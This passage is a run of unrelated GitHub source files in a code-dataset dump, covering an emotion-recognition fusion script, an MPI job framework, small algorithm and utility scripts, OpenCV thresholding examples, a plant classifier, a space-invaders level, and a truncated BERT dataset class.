current_epoch == 1:\n storage_face, storage_body, all_label = concate(body_test_size, face_model, body_model, face_test_loader, face_test_dataset, body_test_loader)\n concate_data = torch.cat((torch.from_numpy(storage_face), torch.from_numpy(storage_body)), 1).float().cuda()\n \n\n with torch.no_grad():\n \n concate_output = fc_model(concate_data)\n loss = CE_criterion(concate_output, all_label.long())\n _, predicts = torch.max(concate_output, 1)\n correct_count_fc = torch.eq(predicts, all_label)\n print('Val loss = ', loss.item())\n correct_num = correct_count_fc.sum()\n val_acc = correct_num.float()/float(len(all_label))\n val_acc = np.around(val_acc.cpu().numpy(), 4)\n print('[Val acc {}/{}] = {}'.format(correct_num.float(), len(all_label), val_acc))\n\n if val_acc > 0.8 and args.mode != 'test':\n store_weight(current_epoch, fc_model.state_dict(), val_acc, performer_number)\n \n return val_acc, concate_data, all_label\n\n\ndef concate(body_size, face_model, body_model, face_loader, face_dataset, body_loader):\n feature_map_face =[]\n storage_face = np.zeros((body_size, args.num_classes))\n storage_body = np.zeros((body_size, args.num_classes))\n video_img_count = 0\n\n with torch.no_grad():\n correct_count_face, correct_count_body, correct_count_whole = 0, 0, 0\n face_model.eval()\n body_model.eval()\n bingo_temp = []\n \n '''Face Output'''\n for batch_i, (face_imgs, face_targets, _) in enumerate(face_loader):\n face_outputs, _ = face_model(face_imgs.cuda())\n face_targets = face_targets.cuda()\n face_percentage = face_outputs\n # face_percentage = torch.nn.functional.softmax(face_outputs, dim=1)\n\n for i in range(len(face_percentage.detach().cpu().numpy())):\n feature_map_face.append(face_percentage[i])#.detach().cpu().numpy()\n \n content, file_path, label = face_dataset.__content__()\n for i in range(len(content)): #videos in total\n for j in range(args.num_classes): #7 emotions in total\n for k in range(video_img_count, video_img_count + content[i]): #all imgs in each video have to add\n storage_face[i][j] += feature_map_face[k][j]\n storage_face[i][j] /= content[i]\n video_img_count += content[i]\n \n\n '''Body Output'''\n video_img_count = 0\n all_label = torch.tensor([]).cuda()\n\n for batch_i, (batch) in enumerate(body_loader):\n body, hand_right, hand_left, length, Y = batch['body'].cuda(), batch['hand_right'].cuda(), batch['hand_left'].cuda(), batch['length'].cuda(), batch['label'].cuda()\n body_outputs = body_model.forward((body, hand_right, hand_left, length))\n _, body_predicts = torch.max(body_outputs, 1)\n # body_percentage = torch.nn.functional.softmax(body_outputs, dim=1)\n # print('Y =',Y)\n all_label = torch.cat((all_label, Y), 0)\n body_percentage = body_outputs\n \n for i in range(len(body_percentage.detach().cpu().numpy())):\n for j in range(args.num_classes):\n storage_body[i + video_img_count][j] = body_percentage[i][j]#.detach().cpu().numpy()\n video_img_count += len(body_percentage.detach().cpu().numpy())\n\n \n print('len_face = ',len(storage_face))\n print('len_body = ',len(storage_body))\n print('length_concate = ',len(all_label))\n \n\n return storage_face, storage_body, all_label\n \n\ndef data_type():\n try:\n if (args.data_type == 'rafdb' or args.data_type == 'affectnet' or args.data_type == 'ferplus' or args.data_type == 'GEMEP_FACE') and args.mtcnn == False:\n args.dataset_path = args.dataset_path + args.data_type + '/'\n print('The dataset is {} and the path is {}'.format(args.data_type, args.dataset_path))\n elif args.mtcnn or args.data_type == 
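The per-video aggregation inside concate() above (frame-level face logits averaged into one row per video, using the per-video frame counts) reduces to a small pure function; an illustrative sketch, not taken from the repo:

import numpy as np

def average_frame_logits(frame_logits, frames_per_video):
    # frame_logits: (total_frames, num_classes); frames_per_video: list of ints.
    out, start = [], 0
    for count in frames_per_video:
        out.append(frame_logits[start:start + count].mean(axis=0))
        start += count
    return np.stack(out)

logits = np.arange(12, dtype=float).reshape(6, 2)   # 6 frames, 2 classes
print(average_frame_logits(logits, [2, 4]))         # one row per video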
'new_test':\n            if args.mtcnn and (args.mt_img_path == None or args.mt_save_path == None):\n                raise Exception('Please enter the img path or the save path.')\n            elif args.data_type == 'new_test' and args.new_test_path == None:\n                raise Exception('Please enter the new test img path')\n            else:\n                args.dataset_path = mtcnn(args.mt_img_path, args.mt_save_path, args.new_test_path, args.mtcnn)\n                args.data_type = args.phase = 'new_test'  # safety net: covers the case where the user runs mtcnn but forgets to set phase and data_type\n                print('Now the dataset path is {}'.format(args.mt_save_path if args.mtcnn else args.new_test_path))\n        else:\n            raise Exception('This dataset is not available in the model.')\n    except Exception as e:\n        print('You need to check your input parameter: ' + str(e))\n        quit()\n    \n    \ndef get_scaler(test_dataset):\n    scaler = {}\n    feats = [\"bodies\", \"hands_right\", \"hands_left\", ]\n\n    for x in feats:\n        all_data = np.vstack(getattr(test_dataset, x)) \n\n        scaler[x] = MinMaxScaler()\n        scaler[x].fit(all_data)\n\n    return scaler\n    \n\ndef store_weight(epoch, model_state_dict, val_acc, fold):\n    torch.save({'iter': epoch,\n                'model_state_dict': model_state_dict,},\n               os.path.join('../models', args.data_type, 'split' + str(fold) + \"_epoch\" + str(epoch) + \"_acc\" + str(val_acc) + \".pth\"))\n    print('Model saved.')\n\n\nif __name__ == \"__main__\":\n    args = parse_args() \n    test()","repo_name":"bernie6401/NTUST_Special_Topic","sub_path":"concate/train_fc_layer.py","file_name":"train_fc_layer.py","file_ext":"py","file_size_in_byte":16752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"227220309","text":"import traceback\nfrom . import validation\n\nfrom mpi4py import MPI\n\nwork_tag=0\nstop_tag=1\njob_successful_tag = 4\njob_failed_tag = 5\n\n\ndef worker(worker_class, worker_name):\n    comm = MPI.COMM_WORLD\n    status = MPI.Status()\n    \n    print('Setting up on ' + worker_name)\n    worker_class.setup()\n    \n    while True:\n        job_details = comm.recv(source=0, tag=MPI.ANY_TAG, status=status)\n        if status.Get_tag() == stop_tag: break\n\n        print('Running job on ' + worker_name)\n        try:\n            job_results = worker_class.run_job(job_details)\n            result_tag = job_successful_tag\n        except Exception as e:\n            full_traceback = traceback.format_exc()\n            print('Failed job on ' + worker_name + '\\n' + str(full_traceback))\n            job_results = worker_class.get_failed_job_result(job_details)\n            result_tag = job_failed_tag\n            print('Failed job caught on ' + worker_name + '. 
Moving on.')\n \n comm.send(obj=job_results, dest=0, tag=result_tag)\n\ndef boss(boss_class):\n comm = MPI.COMM_WORLD\n status = MPI.Status()\n num_workers = MPI.COMM_WORLD.Get_size()\n\n boss_class.setup()\n boss_class.set_total_jobs()\n \n #Dole out the first round of jobs to all workers\n for i in range(1, num_workers):\n if boss_class.jobs_available():\n next_job = boss_class.get_next_job()\n else:\n break\n comm.send(obj=next_job, dest=i, tag=work_tag)\n \n total_jobs = boss_class.total_jobs\n jobs_completed = 0\n #While there are new jobs to assign.\n #Collect results and assign new jobs as others are finished.\n while boss_class.jobs_available():\n job_result = comm.recv(source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag() == job_failed_tag:\n boss_class.process_failed_job(job_result)\n elif status.Get_tag() == job_successful_tag:\n boss_class.process_job_result(job_result)\n \n next_job = boss_class.get_next_job()\n comm.send(obj=next_job, dest=status.Get_source(), tag=work_tag)\n \n jobs_completed+=1\n print('Completed job '+str(jobs_completed)+' of '+str(total_jobs))\n \n #Collect last jobs\n for i in range(1, num_workers):\n job_result = comm.recv(source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag() == job_failed_tag:\n boss_class.process_failed_job(job_result)\n elif status.Get_tag() == job_successful_tag:\n boss_class.process_job_result(job_result)\n\n #Shut down all workers\n for i in range(1, num_workers):\n comm.send(obj=None, dest=i, tag=stop_tag)\n \n boss_class.process_all_results()\n\ndef run_MPI(boss_class, worker_class):\n validation.validate_boss_class(boss_class)\n validation.validate_worker_class(worker_class)\n \n rank = MPI.COMM_WORLD.Get_rank()\n name = MPI.Get_processor_name()\n\n if rank == 0:\n print('boss '+str(rank)+' on '+str(name))\n boss(boss_class)\n else:\n print('worker '+str(rank)+' on '+str(name))\n worker(worker_class, worker_name='worker'+str(rank)+'_'+str(name))\n\n","repo_name":"sdtaylor/pySimpleMPI","sub_path":"pySimpleMPI/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39272260955","text":"# O(n^2) time | O(n^2) space - where n is the number of interns and teams\ndef stableInternships(interns, teams):\n # Write your code here.\n chosenInterns = {}\n freeInterns = list(range(len(interns)))\n currentInternChoices = [0] * len(interns)\n\n teamMaps = []\n for team in teams:\n rank = {}\n for i, internNum in enumerate(team):\n rank[internNum] = i\n teamMaps.append(rank)\n\n while len(freeInterns) > 0:\n internNum = freeInterns.pop()\n\n intern = interns[internNum]\n teamPreference = intern[currentInternChoices[internNum]]\n currentInternChoices[internNum] += 1\n\n if teamPreference not in chosenInterns:\n chosenInterns[teamPreference] = internNum\n continue\n\n previousIntern = chosenInterns[teamPreference]\n previousInternRank = teamMaps[teamPreference][previousIntern]\n currentInternRank = teamMaps[teamPreference][internNum]\n\n if currentInternRank < previousInternRank:\n freeInterns.append(previousIntern)\n chosenInterns[teamPreference] = internNum\n else:\n freeInterns.append(internNum)\n\n matches = [[internNum, teamNum] for teamNum, internNum in chosenInterns.items()]\n return 
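For the boss/worker framework above, a minimal pair of classes that would satisfy the interface used by run_MPI (method names are taken from the calls in this module; everything else, including the job payloads, is illustrative). Note the boss hands out num_workers - 1 initial jobs, so this sketch assumes at least that many jobs exist:

class SquareBoss:
    def setup(self): self.results = []
    def set_total_jobs(self): self.jobs, self.total_jobs = list(range(100)), 100
    def jobs_available(self): return len(self.jobs) > 0
    def get_next_job(self): return self.jobs.pop()
    def process_job_result(self, result): self.results.append(result)
    def process_failed_job(self, result): pass
    def process_all_results(self): print(sorted(self.results)[:5])

class SquareWorker:
    def setup(self): pass
    def run_job(self, x): return x * x
    def get_failed_job_result(self, x): return None

# Launched under MPI, e.g.: mpirun -n 4 python my_script.py
# run_MPI(SquareBoss(), SquareWorker())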
matches\n","repo_name":"Wanderer-Keerthi/algo-expert","sub_path":"stable_internships.py","file_name":"stable_internships.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1733606792","text":"import time\nuser_plays = True\nwhile user_plays:\n print(\"Welcome to the tip calculator!\")\n bill = float(input(\"What was the total bill? $\\n\"))\n tip = int(input(\"How much tip would you like to give? 10, 12, or 15?\\n\"))\n people = int(input(\"How many people to split the bill?\\n\"))\n\n tip_as_percent = tip / 100\n total_tip_amount = bill * tip_as_percent\n total_bill = bill + total_tip_amount\n bill_per_person = total_bill / people\n final_amount = round(bill_per_person, 2)\n\n print(f\"Each person should pay: ${final_amount}\\n\")\n user_choice = input(\"Sir Do You Want To Calculate it Again??\").lower()\n if user_choice == 'y':\n user_plays = True\n continue\n elif user_choice == 'n':\n print(\"Good Byee!\")\n user_plays = False\n break\n else:\n print(\"Invalid Command, Please Try Again!\")\n time.sleep(5)\n user_plays = False\n","repo_name":"InvisiblePro/Hacktoberfest-2022","sub_path":"Python/Tip Calculator.py","file_name":"Tip Calculator.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"15207112010","text":"import Chessnut\nimport chess\nimport chess.pgn\n\nimport sys\n\ndef long_sequence_to_pgn(seq):\n moves = seq\n game = chess.pgn.Game()\n# with open(filename, 'r') as f:\n# moves = f.read().split('\\n');\n game.setup(chess.Board(\"r1bqkbnr/pppp1ppp/2n5/4p3/4P3/5N2/PPPP1PPP/RNBQKB1R w KQkq - 2 3\"))\n node = game\n for move in moves:\n node = node.add_variation(chess.Move.from_uci(move))\n return str(game)\n\nuci_long = sys.stdin.read().strip().split('\\n')\nprint(uci_long)\nprint(long_sequence_to_pgn(uci_long))","repo_name":"TauSigma5/sc0","sub_path":"uci-to-pgn.py","file_name":"uci-to-pgn.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72156414567","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# 1. 讀取圖片→轉成灰階\nimg = cv2.imread(\"W_A1_0_3.jpg\")\n# img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #0 is black ; 255 is white 0~255不同的灰\n\n# 1-2. 
Read directly as grayscale\n# img = cv2.imread(\"W_A1_0_3.jpg\", flags=cv2.IMREAD_GRAYSCALE)\n# img = cv2.imread(\"W_A1_0_3.jpg\",0) # read directly as a single channel\n\n# 2. Display the image\n# cv2.imshow(\"result\",img)\n# cv2.waitKey(0)\n\n# # Define the image height, width and center\n# height = img.shape[0]\n# width = img.shape[1]\n# center = (int(height/2),int(width/2))\n\n\n# -------------------------------------------------------------------\n\n# # Image attributes\n# print(img.shape) # 3648*5472, 3 channels\n\n# # Total number of pixels\n# print(img.size)\n\n# # Image dtype\n# print(img.dtype) #uint8\n\n\n# # Pixel at position (x,y)\n# px = img[100,100]\n# print(px) # prints BGR [25 25 25]\n\n# # Read the individual color channels\n# blue = img[100,100,0]\n# green = img[100,100,1]\n# red = img[100,100,2]\n# print(blue,green,red)\n\n# # Modify a pixel value\n# img[100,100] = [255,255,255]\n# print(img[100,100])\n\n\n# # Image region of interest (ROI)\n# ball = img[280:340, 330:390] # rectangle from (280,340) to (330,390)\n\n# Split and merge image channels\n# b,g,r = cv2.split(img)\n\n# -------------------------------\n\n# print(img_gray[100,100])\n\n# # cv2 is BGR ; matplotlib is RGB\n# # Do the color conversion\n# img_mat = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n# plt.imshow(img) # inverted colors\n# plt.show()\n# plt.imshow(img_mat) # correct colors\n# plt.show()\n\n# ----------------Histogram-----------------------\n\n\n# # Plot the first subplot\n# plt.subplot(221)\n# img_mat = cv2.cvtColor(img,cv2.COLOR_BGR2RGB) # convert to RGB\n# plt.imshow(img_mat)\n\n# # Plot the second subplot\n# plt.subplot(222)\n# img_gray = cv2.cvtColor(img_mat,cv2.COLOR_RGB2GRAY) # convert to grayscale\n# plt.imshow(img_gray)\n\n# # Plot the third subplot\n# plt.subplot(223)\n# plt.hist(img.ravel(),256),plt.title(\"hist\") # img.ravel() flattens the array to 1-D; 256 bins covering [0,255]\n\n# # Plot the fourth subplot\n# plt.subplot(224)\n# plt.hist(img_gray.ravel(),256),plt.title(\"hist\") \n# plt.show()\n\n# -------------------cv2-------------------------------------------------\n\nimport cv2\nimport numpy as np\n\n\n# # 1. Read the image → convert to grayscale\n# img = cv2.imread(\"W_A1_0_3.jpg\")\n# img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# 1-2. 
Read directly as grayscale\n# img = cv2.imread(\"W_A1_0_3.jpg\", flags=cv2.IMREAD_GRAYSCALE)\n# img = cv2.imread(\"W_A1_0_3.jpg\",0)\n\n# 2. Display the image\n# cv2.imshow(\"result\",img)\n# cv2.waitKey(0)\n\n# --------------------------------------------------------------------------------\n\n# Read the image as grayscale\nimg = cv2.imread(\"W_A1_0_3.jpg\",0)\n\n# Binarization\n# cv2.threshold(img, threshold, fill value, threshold type) # requires a grayscale image\n# the ret return value must be unpacked\nret, Threshold1 = cv2.threshold(img,172,255,cv2.THRESH_BINARY)\n\n# Otsu's threshold\nret2, Threshold2 = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\n# 11 is the block size (the neighbourhood used to compute the threshold), 2 is the C value (threshold = mean - C)\nThreshold3 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C , cv2.THRESH_BINARY,11,2 )\nThreshold4 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C , cv2.THRESH_BINARY,11,2)\n\ntitles = ['original image', 'global thresholding (v=172)', 'otsu thresholding','Adaptive mean thresholding', 'adaptive gaussian thresholding'] \nimages = [img,Threshold1,Threshold2,Threshold3,Threshold4]\n\n# matplotlib output\nfor i in range(5):\n    plt.subplot(2,3,i+1), plt.imshow(images[i],\"gray\")\n    plt.title(titles[i])\n    plt.xticks([]),plt.yticks([]) # hide the x and y ticks\nplt.show()\n\n# # cv2 output\n# cv2.imshow('Original', img)\n# cv2.imshow('BINARY',Threshold1)\n# cv2.imshow('OTSU', Threshold2)\n# cv2.imshow('ADAPTIVE_THRESH_MEAN', Threshold3)\n# cv2.imshow('ADAPTIVE_THRESH_GAUSSIAN', Threshold4)\n\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n\n# --------------------------------------\n# # Read the image\n# img = cv2.imread('W_A1_0_3.jpg',flags=cv2.IMREAD_GRAYSCALE)\n# iter_time = 1\n\n# kernel = np.ones((3,3),np.uint8)\n# closing_img = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernel,iterations=iter_time)\n\n# cv2.imwrite('dao_closing_k5_iter%d.png'%(iter_time), np.hstack((img, closing_img)))\n","repo_name":"finemtt1/Python","sub_path":"image_processing/0.img_base_meth.py","file_name":"0.img_base_meth.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"9569711354","text":"from tensorflow.keras.models import load_model\nimport numpy as np\nfrom PIL import Image\nfrom logConfig import logging\nimport heapq\nfrom repository import getPlant\n\nlogging.info(\"-----Loading model-----\\n\\n\\n\")\n\n# loading model\nmodel = load_model(\"model\")\n\nlogging.info(\"-----Model Loaded-----\\n\\n\\n\")\n\n\n# defining classes\nclasses = [ 'Arive-Dantu','Betel','Basale','Crape_Jasmine','Curry','Drumstick','Fenugreek','Guava','Hibiscus','Indian_Beech','Indian_Mustard','Jackfruit',\n            'Jamaica_Cherry-Gasagase','Jamun','Jasmine','Karanda','Lemon','Mango','Mexican_Mint','Mint','Neem','Oleander','Parijata','Peepal','Pomegranate',\n            'Rasna','Rose_apple','Roxburgh_fig','Sandalwood','Tulsi']\n\n\n# classification function\ndef classify(imagePath):\n\n    # enclosing in try block to catch exception\n    try:\n        logging.info(\"-----Classify image with path = %s-----\",imagePath)\n\n        # loading image from path and converting to numpy array for prediction\n        image = Image.open(imagePath)\n        image = np.array(image)\n        image = image.reshape(1,image.shape[0],image.shape[1],3)\n\n        # ---- classification flow starts ----\n\n        # prediction\n        prediction = model.predict(image)[0]\n\n        # finding the top class and its prediction score (accuracy)\n        _class = np.argmax(prediction)\n        predictionScore = prediction[_class]\n        print(classes[_class],predictionScore)\n\n        # ---- Result logic starts ----\n\n        # if predictionScore greater than 90% return single class\n        if(predictionScore>0.90):\n            
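To make the THRESH_OTSU call above less of a black box: the threshold Otsu's method returns can be reproduced by maximizing the between-class variance of the grayscale histogram. A small pure-NumPy sketch of that criterion (illustrative, not OpenCV's implementation):

import numpy as np

def otsu_threshold(gray):
    # gray: 2-D uint8 array; returns the t maximizing w0*w1*(mu0 - mu1)^2.
    hist = np.bincount(gray.ravel(), minlength=256).astype(float)
    p = hist / hist.sum()
    best_t, best_var = 0, -1.0
    for t in range(1, 256):
        w0, w1 = p[:t].sum(), p[t:].sum()
        if w0 == 0 or w1 == 0:
            continue
        mu0 = (np.arange(t) * p[:t]).sum() / w0
        mu1 = (np.arange(t, 256) * p[t:]).sum() / w1
        var = w0 * w1 * (mu0 - mu1) ** 2
        if var > best_var:
            best_t, best_var = t, var
    return best_t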
logging.info(\"-----Classification report = %s probability = %s-----\",classes[_class],predictionScore)\n result = []\n details = getPlant(id=_class+1)\n result.append({\"class\":classes[_class],\"confidence\":float(prediction[_class]),\"details\":details})\n return result\n\n # if 90 >= predictionScore > 80 return two classes\n elif(predictionScore>0.80):\n logging.info(\"-----Classification probability less than 90% Returning top 2 classes-----\")\n result = []\n _class = heapq.nlargest(2, range(len(prediction)), key=prediction.__getitem__)\n for i in _class:\n details = getPlant(id=i+1)\n result.append({\"class\":classes[i],\"confidence\":float(prediction[i]),\"details\":details})\n return result\n \n # if 80 >= predictionScore > 70 return two classes\n elif(predictionScore>=0.70):\n logging.info(\"-----Classification probability less than 80% Returning top 3 classes-----\")\n result = []\n _class = heapq.nlargest(3, range(len(prediction)), key=prediction.__getitem__)\n for i in _class:\n details = getPlant(id=i+1)\n result.append({\"class\":classes[i],\"confidence\":float(prediction[i]),\"details\":details})\n return result\n \n # accuracy criteria not satisfied\n else:\n return \"Not satisfied\"\n \n # ---- Result logic starts ----\n\n # ---- classication flow ends ----\n\n # catch exception if any\n except Exception as e:\n print(e)\n return \"error\"\n\n\n# classify(\"uploads/__0_1104004.png\")","repo_name":"vishnuoum/Medicinal-Plant-Classification","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31513402391","text":"from graphics import *\nfrom swarm import *\nfrom mothership import *\nfrom alien import *\nfrom player import *\n\nclass Level:\n def __init__(self, level_str, player, ser, win):\n self.win = win\n if player == None:\n self.player = Player(self.win)\n else:\n self.player = player\n self.ser = ser\n self.swarm = Swarm(level_str, self.win)\n self.alien_bullets = []\n self.player_bullets = []\n self.shield_bullets = []\n self.finished = False\n self.player_won = False\n self.win_message = Text(Point(self.win.getWidth() / 2, self.win.getHeight() / 2), \"Level cleared!\")\n self.score = Text(Point(self.win.getWidth() / 2, 70 + self.win.getHeight() / 2), \"\")\n self.end_message = Text(Point(self.win.getWidth() / 2, 40 + self.win.getHeight() / 2), \"Press enter to continue.\")\n self.mothership = None\n\n def run(self):\n\n while not self.finished:\n self.swarm.move()\n self.doMothership()\n self.moveBullets()\n\n self.alien_bullets += self.swarm.shoot()\n\n key = self.win.checkKey()\n serial_data = self.ser.readLine()\n if key == \"Left\" or serial_data[1] != 0:\n self.player.moveLeft(serial_data[1])\n elif key == \"Right\" or serial_data[1] != 0:\n self.player.moveRight(serial_data[1])\n if key == \"space\" or serial_data[2] == 0:\n bullet = self.player.shoot()\n if bullet != None:\n self.player_bullets.append(bullet)\n if key == \"Return\" or serial_data[0]:\n if self.player.hasAbility():\n self.player.addScore(200)\n self.player_bullets.append(self.player.useAbility())\n \n\n self.finished, self.player_won = self.checkAllCollisions()\n\n if not self.player_won: \n self.win_message.setText(\"Better luck next time!\")\n self.score.setText(\"Score: \" + self.player.getScore())\n self.end_message.setText(\"Press q to exit, or Enter to try again.\")\n\n self.win_message.setSize(36)\n self.win_message.setTextColor(\"light green\")\n 
self.win_message.draw(self.win)\n self.score.setSize(25)\n self.score.setTextColor(\"white\")\n self.score.draw(self.win)\n self.end_message.setSize(20)\n self.end_message.setTextColor(\"white\")\n self.end_message.draw(self.win)\n key = self.win.getKey()\n while key != \"q\" and key != \"Return\":\n key = self.win.getKey()\n self.endLevel()\n return self.player_won, self.player, key\n \n def getPlayer(self):\n return self.player\n\n def moveBullets(self):\n for bullet in self.alien_bullets:\n bullet.move()\n for bullet in self.player_bullets:\n bullet.move()\n for bullet in self.shield_bullets:\n bullet.move()\n\n def hasMothership(self):\n return not self.mothership == None\n\n def doMothership(self):\n if self.hasMothership():\n if self.mothership.isDead():\n self.mothership = None\n return\n self.mothership.move()\n else:\n if randint(0, 1000) < 1:\n self.mothership = Mothership(randint(0, 1), self.win)\n\n def checkAllCollisions(self):\n if self.checkAlienBulletCollisions() or self.checkPlayerCollisions():\n return True, False\n elif self.checkPlayerBulletCollisions():\n return True, True\n return False, False\n\n def checkAlienBulletCollisions(self):\n for bullet in self.alien_bullets:\n if bullet.isDead():\n continue\n if bullet.isColliding(self.player):\n killed = self.player.kill()\n bullet.kill()\n if killed:\n return True\n\n def checkPlayerCollisions(self):\n found_collision, _ = self.swarm.checkCollisionWith(self.player)\n if found_collision:\n self.player.kill()\n return True\n\n for bullet in self.shield_bullets:\n if not bullet.isDead() and bullet.isColliding(self.player):\n bullet.kill()\n self.player.setShield()\n self.player.addScore(50)\n\n def checkPlayerBulletCollisions(self):\n for bullet in self.player_bullets:\n if bullet.isDead():\n continue\n\n if self.hasMothership():\n if bullet.isColliding(self.mothership):\n self.mothership.kill()\n self.checkNewBullets(bullet.kill())\n self.shield_bullets.append(self.mothership.spawnShieldBullet(self.player.bottom()))\n self.player.addScore(200)\n\n for alien_bullet in self.alien_bullets:\n if alien_bullet.isDead():\n continue\n if bullet.isColliding(alien_bullet):\n self.checkNewBullets(bullet.kill())\n alien_bullet.kill()\n self.player.addScore(50)\n\n for shield_bullet in self.shield_bullets:\n if shield_bullet.isDead():\n continue\n if shield_bullet.isColliding(bullet):\n self.checkNewBullets(bullet.kill())\n shield_bullet.kill()\n self.player.setShield()\n\n found_collision, collisions = self.swarm.checkCollisionWith(bullet)\n if found_collision:\n for collision in collisions:\n self.player.addScore(100)\n collision.kill()\n self.checkNewBullets(bullet.kill())\n death_attack = collision.deathAttack()\n if not death_attack == None:\n self.alien_bullets.append(death_attack)\n self.player.doPowerup(collision.id())\n self.swarm.intensify(len(collisions))\n return self.swarm.isDead()\n\n def checkNewBullets(self, bullets):\n if bullets == None:\n return\n self.player_bullets += bullets\n\n def endLevel(self):\n self.swarm.clear()\n if not self.player_won:\n self.player.clear()\n self.win_message.undraw()\n self.end_message.undraw()\n self.score.undraw()\n if self.hasMothership():\n self.mothership.kill()\n for bullet in self.alien_bullets:\n bullet.kill()\n for bullet in self.player_bullets:\n bullet.kill()\n for bullet in self.shield_bullets:\n bullet.kill()\n del self.alien_bullets\n del self.player_bullets\n del 
self.shield_bullets\n","repo_name":"tgomezzzz/space_invaders_arduino","sub_path":"src/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":6827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7787704611","text":"import numpy as np\nn = int(input(\"Enter the limit: \"))\na = []\nprint(\"Enter the elements: \")\nfor i in range(n):\n a.append(int(input()))\nprint(\"Before sorting - \")\nfor i in a:\n print(i)\nfor i in range(0, len(a)):\n for j in range(i + 1, len(a)):\n if a[j] < a[i]:\n temp = a[j]\n a[j] = a[i]\n a[i] = temp\nprint(\"\\nAfter sorting - \")\nfor i in a:\n print(i, end=\" \")","repo_name":"Abinalakalathil/Data-science-final-exam","sub_path":"bubble sort.py","file_name":"bubble sort.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10589428381","text":"import random\n\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import Dataset\nimport torchtext\n\nfrom language.dataset.vocab import get_vocab\nfrom language.utils.log import get_logger\n\n\nlogger = get_logger()\n\n\nclass BertDataset(Dataset):\n \"\"\"\n Dataset for bert training.\n\n Reference: http://d2l.ai/chapter_natural-language-processing-pretraining/glove.html.\n \"\"\"\n\n def __init__(self, data_path, vocab_path, min_freq, specials, ignore_case, max_len, **kwargs):\n \"\"\"\n :param data_path: path to dataset.\n :param vocab_path: path to vocab file.\n :param min_freq: minimum frequency.\n :param specials: List[str], special symbols to add.\n :param ignore_case: bool, whether to ignore case.\n :param max_len: max length of sentence pair.\n \"\"\"\n super().__init__()\n logger.info(f'Loading raw paragraphs from: {data_path}...')\n raw_paragraphs = self._get_raw_paragraphs(data_path)\n if ignore_case:\n raw_paragraphs = [[[token.lower() for token in line]\n for line in paragraph]\n for paragraph in raw_paragraphs]\n logger.info(f'Got {len(raw_paragraphs)} raw paragraphs.')\n\n raw_lines = [line for paragraph in raw_paragraphs for line in paragraph]\n self._vocab = get_vocab(vocab_path, raw_lines, min_freq, specials)\n logger.info(f'Vocab size: {len(self._vocab)}.')\n logger.info(f'Replace raw token with token index.')\n paragraphs = [[self._vocab.lookup_indices(line) for line in paragraph] for paragraph in raw_paragraphs]\n\n self._max_len = max_len\n sentence_pair_data = self._get_sentence_pair_data(paragraphs, self._vocab, max_len)\n self._data = self._setup_data(sentence_pair_data, self._vocab)\n logger.info(f'Dataset is ready, size: {len(self)}.')\n\n def _get_raw_paragraphs(self, data_path, **kwargs):\n \"\"\"\n :param data_path: path to data.\n :return: List[List[List[token]]].\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def _get_sentence_pair_data(paragraphs, vocab, max_len):\n \"\"\"\n Get sentence pair data.\n :param paragraphs: List[List[List[token_index]]]\n :param vocab: torchtext.vocab.Vocab.\n :param max_len: int, max length of sentence pair.\n :return: List[dict].\n \"\"\"\n logger.info(f'Setup sentence pair data...')\n sentence_pair_data = list()\n paragraph_index_list = list(range(len(paragraphs)))\n for i, paragraph in tqdm(enumerate(paragraphs), total=len(paragraphs)):\n for j in range(len(paragraph) - 1):\n tokens_a = paragraph[j]\n\n # tokens_b\n is_next = random.random() < 0.5\n if is_next:\n tokens_b = paragraph[j + 1]\n else:\n chosen_paragraph_index = i\n while chosen_paragraph_index == 
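A side note on the sorting record above: the nested i/j loop that swaps against a[i] is closer to selection sort than bubble sort. Classic bubble sort compares adjacent elements and can stop early when a pass makes no swap; a small sketch:

def bubble_sort(a):
    # Repeatedly swap adjacent out-of-order pairs; the largest
    # unsorted element bubbles to the end on each pass.
    for end in range(len(a) - 1, 0, -1):
        swapped = False
        for j in range(end):
            if a[j] > a[j + 1]:
                a[j], a[j + 1] = a[j + 1], a[j]
                swapped = True
        if not swapped:  # already sorted: stop early
            break
    return a

assert bubble_sort([5, 1, 4, 2, 8]) == [1, 2, 4, 5, 8]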
